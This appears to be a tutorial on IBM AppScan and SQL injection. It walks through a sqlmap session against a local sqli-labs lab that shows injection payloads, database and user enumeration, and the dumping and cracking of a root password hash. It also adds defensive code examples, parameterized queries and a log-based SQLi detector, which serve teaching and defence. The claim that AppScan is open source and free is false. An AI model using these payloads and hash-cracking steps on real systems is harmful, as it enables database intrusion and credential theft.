AppScan Overview

AppScan is developed by IBM and is one of the most widely used tools in Web application penetration testing; it helps security professionals run automated vulnerability assessments of Web applications.

AppScan 8.0    Chinese-language, open source, free

  • Installing on Windows 10 requires installing .NET Framework 3.5 first
  • It can also be installed in a Windows 7 virtual machine

AppScan Penetration Testing

  • Choose a test policy:
    • Default: includes all tests, but not invasive tests or port listeners
    • Application Only: includes all application-level tests, but not invasive tests or port listeners
    • Infrastructure Only: includes all infrastructure-level tests, but not invasive tests or port listeners
    • Invasive: includes all invasive tests (tests that may affect server stability)
    • Complete: includes all AppScan tests
    • The Vital Few: a selection of tests with a high probability of success; useful for assessing a site when time is limited
    • Developer Essentials: a selection of application tests with a very high probability of success; may be useful for assessing a site when time is limited

SQL Injection

How SQL Injection Works

Suppose we type www.sample.com into the browser. This is a plain request for a page that issues no dynamic query to the database, so there is no SQL injection here.

When we enter www.sample.com?testid=23, we pass the variable testid in the URL with the value 23. Because this request triggers a dynamic query against the database (the ?testid=23 part is the variable used in that query), we can embed a malicious SQL statement in the URL.

The program never checks whether the user-supplied data is valid, so an attacker can bypass the application's restrictions, construct an SQL statement and pass it through to the database, thereby operating on the database directly.
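The contrast just described (a static page versus a dynamic ?id= query built from unchecked input), as an added example that is not code from the original post or from sqli-labs: a small Python/SQLite program builds the lookup the vulnerable way, then with a bound parameter, then with the input check the text says is missing, and feeds all three the boolean-based payload that appears in the sqlmap output later on this page (id=1' AND 6790=6790 AND 'NFLR'='NFLR). The users table, its rows, the "false" twin of the payload and the lookup_* function names are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample table standing in for the target application's
# users table (assumption: sqli-labs' real schema is not reproduced here).
SAMPLE_USERS = [(1, "Dumb"), (2, "Angelina"), (3, "Dummy")]

# Boolean-based payload copied from the page's sqlmap output, plus a
# "false" twin constructed for contrast: the only difference is 6790=6790
# versus 6790=6791, which is exactly how blind injection reads one bit.
PAYLOAD_TRUE = "1' AND 6790=6790 AND 'NFLR'='NFLR"
PAYLOAD_FALSE = "1' AND 6790=6791 AND 'NFLR'='NFLR"

# What a legitimate id looks like: a short run of decimal digits.
ID_RE = re.compile(r"[0-9]{1,9}")


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern the page describes: the ?id= value is pasted into the
    SQL text. The quote inside the input closes the string literal, and
    everything after it is parsed as SQL, so the request controls the
    WHERE clause."""
    sql = f"SELECT id, username FROM users WHERE id = '{raw_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Same query with a bound parameter: the value travels separately
    from the SQL text, so a quote in it is just a character to compare."""
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def lookup_hardened(conn, raw_id):
    """Parameter binding plus the input check the page says is missing:
    an id must be a short decimal integer; anything else is rejected
    before the database is touched."""
    if not isinstance(raw_id, str) or not ID_RE.fullmatch(raw_id):
        raise ValueError(f"rejected non-numeric id: {raw_id!r}")
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def demo():
    """Run the lookups against the same data and return the rows each
    case produced, keyed by case name."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),
        "vuln_true": lookup_vulnerable(conn, PAYLOAD_TRUE),
        "vuln_false": lookup_vulnerable(conn, PAYLOAD_FALSE),
        "param_true": lookup_parameterized(conn, PAYLOAD_TRUE),
        "hardened_ok": lookup_hardened(conn, "2"),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:12s} -> {rows}")
```

The vulnerable lookup returns the row for the true payload and nothing for the false one; that difference in responses is the only signal the boolean-based blind technique in the sqlmap output needs. With the bound parameter the same string matches nothing, and the hardened variant refuses it before any query runs, which also keeps the time-based and UNION payloads shown later from ever reaching the database.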

Harm Caused by SQL Injection

  • Gathering information about the database
  • Operating on the database
    • inserting data
    • deleting data
    • modifying data
  • Operating on the operating system
    • using the database's built-in features to act on the operating system

SQL Injection Demo

Set up an SQL injection lab

Test

Enumerate databases

Enumerate users

Crack passwords

Detailed procedure

root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:04:24

[16:04:24] [INFO] resuming back-end DBMS 'mysql'
[16:04:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6790=6790 AND 'NFLR'='NFLR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='Heej

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'emOX'='emOX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:04:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:04:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'

[*] shutting down at 16:04:25

root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1 --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:06:00

[16:06:00] [INFO] resuming back-end DBMS 'mysql'
[16:06:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6790=6790 AND 'NFLR'='NFLR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='Heej

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'emOX'='emOX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:06:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:06:01] [INFO] fetching database names
[16:06:02] [INFO] the SQL query used returns 6 entries
[16:06:03] [INFO] retrieved: information_schema
[16:06:04] [INFO] retrieved: challenges
[16:06:06] [INFO] retrieved: mysql
[16:06:07] [INFO] retrieved: performance_schema
[16:06:08] [INFO] retrieved: security
[16:06:09] [INFO] retrieved: test
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

[16:06:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'

[*] shutting down at 16:06:09

root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1 --users
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:06:32

[16:06:33] [INFO] resuming back-end DBMS 'mysql'
[16:06:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6790=6790 AND 'NFLR'='NFLR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='Heej

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'emOX'='emOX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:06:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:06:34] [INFO] fetching database users
[16:06:35] [INFO] the SQL query used returns 84 entries
[16:06:36] [INFO] retrieved: 'root'@'localhost'
[16:06:37] [INFO] retrieved: 'root'@'localhost'
[16:06:38] [INFO] retrieved: 'root'@'localhost'
[16:06:39] [INFO] retrieved: 'root'@'localhost'
[16:06:40] [INFO] retrieved: 'root'@'localhost'
[16:06:41] [INFO] retrieved: 'root'@'localhost'
[16:06:42] [INFO] retrieved: 'root'@'localhost'
[16:06:43] [INFO] retrieved: 'root'@'localhost'
[16:06:44] [INFO] retrieved: 'root'@'localhost'
[16:06:45] [INFO] retrieved: 'root'@'localhost'
[16:06:46] [INFO] retrieved: 'root'@'localhost'
[16:06:47] [INFO] retrieved: 'root'@'localhost'
[16:06:48] [INFO] retrieved: 'root'@'localhost'
[16:06:49] [INFO] retrieved: 'root'@'localhost'
[16:06:50] [INFO] retrieved: 'root'@'localhost'
[16:06:51] [INFO] retrieved: 'root'@'localhost'
[16:06:52] [INFO] retrieved: 'root'@'localhost'
[16:06:53] [INFO] retrieved: 'root'@'localhost'
[16:06:54] [INFO] retrieved: 'root'@'localhost'
[16:06:55] [INFO] retrieved: 'root'@'localhost'
[16:06:56] [INFO] retrieved: 'root'@'localhost'
[16:06:57] [INFO] retrieved: 'root'@'localhost'
[16:06:58] [INFO] retrieved: 'root'@'localhost'
[16:06:59] [INFO] retrieved: 'root'@'localhost'
[16:07:00] [INFO] retrieved: 'root'@'localhost'
[16:07:02] [INFO] retrieved: 'root'@'localhost'
[16:07:03] [INFO] retrieved: 'root'@'localhost'
[16:07:04] [INFO] retrieved: 'root'@'localhost'
[16:07:05] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:06] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:07] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:08] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:09] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:10] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:11] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:12] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:13] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:14] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:15] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:16] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:17] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:18] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:19] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:20] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:21] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:22] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:23] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:24] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:25] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:26] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:27] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:28] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:29] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:30] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:31] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:32] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:33] [INFO] retrieved: 'root'@'::1'
[16:07:34] [INFO] retrieved: 'root'@'::1'
[16:07:35] [INFO] retrieved: 'root'@'::1'
[16:07:37] [INFO] retrieved: 'root'@'::1'
[16:07:38] [INFO] retrieved: 'root'@'::1'
[16:07:39] [INFO] retrieved: 'root'@'::1'
[16:07:40] [INFO] retrieved: 'root'@'::1'
[16:07:41] [INFO] retrieved: 'root'@'::1'
[16:07:42] [INFO] retrieved: 'root'@'::1'
[16:07:43] [INFO] retrieved: 'root'@'::1'
[16:07:44] [INFO] retrieved: 'root'@'::1'
[16:07:45] [INFO] retrieved: 'root'@'::1'
[16:07:46] [INFO] retrieved: 'root'@'::1'
[16:07:47] [INFO] retrieved: 'root'@'::1'
[16:07:48] [INFO] retrieved: 'root'@'::1'
[16:07:49] [INFO] retrieved: 'root'@'::1'
[16:07:50] [INFO] retrieved: 'root'@'::1'
[16:07:51] [INFO] retrieved: 'root'@'::1'
[16:07:52] [INFO] retrieved: 'root'@'::1'
[16:07:53] [INFO] retrieved: 'root'@'::1'
[16:07:54] [INFO] retrieved: 'root'@'::1'
[16:07:55] [INFO] retrieved: 'root'@'::1'
[16:07:56] [INFO] retrieved: 'root'@'::1'
[16:07:57] [INFO] retrieved: 'root'@'::1'
[16:07:58] [INFO] retrieved: 'root'@'::1'
[16:07:59] [INFO] retrieved: 'root'@'::1'
[16:08:00] [INFO] retrieved: 'root'@'::1'
[16:08:01] [INFO] retrieved: 'root'@'::1'
database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

[16:08:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'

[*] shutting down at 16:08:01

root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1 --passwords
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:08:21

[16:08:21] [INFO] resuming back-end DBMS 'mysql'
[16:08:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6790=6790 AND 'NFLR'='NFLR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='Heej

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'emOX'='emOX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:08:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:08:23] [INFO] fetching database users password hashes
[16:08:24] [INFO] the SQL query used returns 3 entries
[16:08:25] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
[16:08:26] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
[16:08:27] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:08:33] [INFO] writing hashes to a temporary file '/tmp/sqlmapGKfAZ91581/sqlmaphashes-xdzYdN.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[16:08:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 3
what's the list file location?
> 3
[16:09:40] [CRITICAL] there was a problem while loading dictionaries ('unable to read file '3'')
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[16:09:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:09:51] [INFO] starting dictionary-based cracking (mysql_passwd)
[16:09:51] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[16:10:03] [INFO] cracked password 'root' for user 'root'
database management system users password hashes:
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[16:10:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'

[*] shutting down at 16:10:03

root@kali:~#
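The sqlmap session above as it looks from the server side, as an added example that is not part of the original post and is not sqlmap's or AppScan's code: a Python script parses Apache combined-format access-log lines, URL-decodes each query parameter and flags the payload shapes that appear in the sqlmap output (a quote followed by a numeric tautology, SLEEP(), UNION ... SELECT, the FLOOR(RAND(0)*2) error trick, INFORMATION_SCHEMA), plus sqlmap's self-identifying User-Agent, then counts flagged requests per client and path. The log lines are constructed for this example; only the target path, the parameter name and the payload shapes come from the page, and the UNION payload's long hex literal is shortened. It assumes sqlmap was run with its default User-Agent and that the web server writes the combined log format.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (not from the page). They
# mimic the page's session against /sqli-labs/less-1/?id=... with payload
# shapes taken from the sqlmap output, percent-encoded as sent on the wire.
# Client IPs, dates and byte counts are invented; the UNION payload's hex
# literal is shortened.
SAMPLE_LOG = """\
192.168.10.130 - - [12/Dec/2017:16:04:24 +0800] "GET /sqli-labs/less-1/?id=1 HTTP/1.1" 200 1011 "-" "Mozilla/5.0"
192.168.10.130 - - [12/Dec/2017:16:04:25 +0800] "GET /sqli-labs/less-1/?id=1%27%20AND%206790%3D6790%20AND%20%27NFLR%27%3D%27NFLR HTTP/1.1" 200 1011 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"
192.168.10.130 - - [12/Dec/2017:16:04:26 +0800] "GET /sqli-labs/less-1/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27emOX%27%3D%27emOX HTTP/1.1" 200 1011 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"
192.168.10.130 - - [12/Dec/2017:16:04:31 +0800] "GET /sqli-labs/less-1/?id=-7043%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716a716a71%2C0x7178787671%29%2CNULL--%20HGXa HTTP/1.1" 200 1011 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"
10.0.0.7 - - [12/Dec/2017:16:05:01 +0800] "GET /sqli-labs/less-1/?id=2 HTTP/1.1" 200 998 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Dec/2017:16:05:03 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# One pattern per injection technique named in the page's sqlmap output.
SIGNATURES = [
    ("boolean-based", re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-probe", re.compile(r"information_schema", re.I)),
]

# Apache "combined" format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Split one combined-format line into fields and decode its query
    string; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes, so the signatures see the payload text
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(value):
    """Names of the signatures a decoded parameter value triggers."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(text):
    """Flag every request whose parameters or User-Agent look like the
    session on the page; each finding lists all reasons for that line."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = [f"{sig} in {name}"
                   for name, value in rec["params"]
                   for sig in classify(value)]
        # sqlmap announces itself unless run with --user-agent/--random-agent
        if "sqlmap" in rec["ua"].lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": rec["path"], "reasons": reasons})
    return findings


def summarize(findings):
    """Flagged requests per (client, path): a single hit may be a false
    positive, a run of them from one source against one path is a scan."""
    return Counter((f["ip"], f["path"]) for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ts"]} {f["ip"]} {f["path"]}: {", ".join(f["reasons"])}')
    for (ip, path), n in summarize(found).items():
        print(f"{ip} sent {n} flagged requests to {path}")
```

The per-client count matters as much as the signatures: the session on the page issued well over a hundred requests to the same path and parameter within a few minutes (84 retrievals for the --users step alone), and that burst against a single parameter is visible even when a scanner changes its User-Agent or encodes payloads differently.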
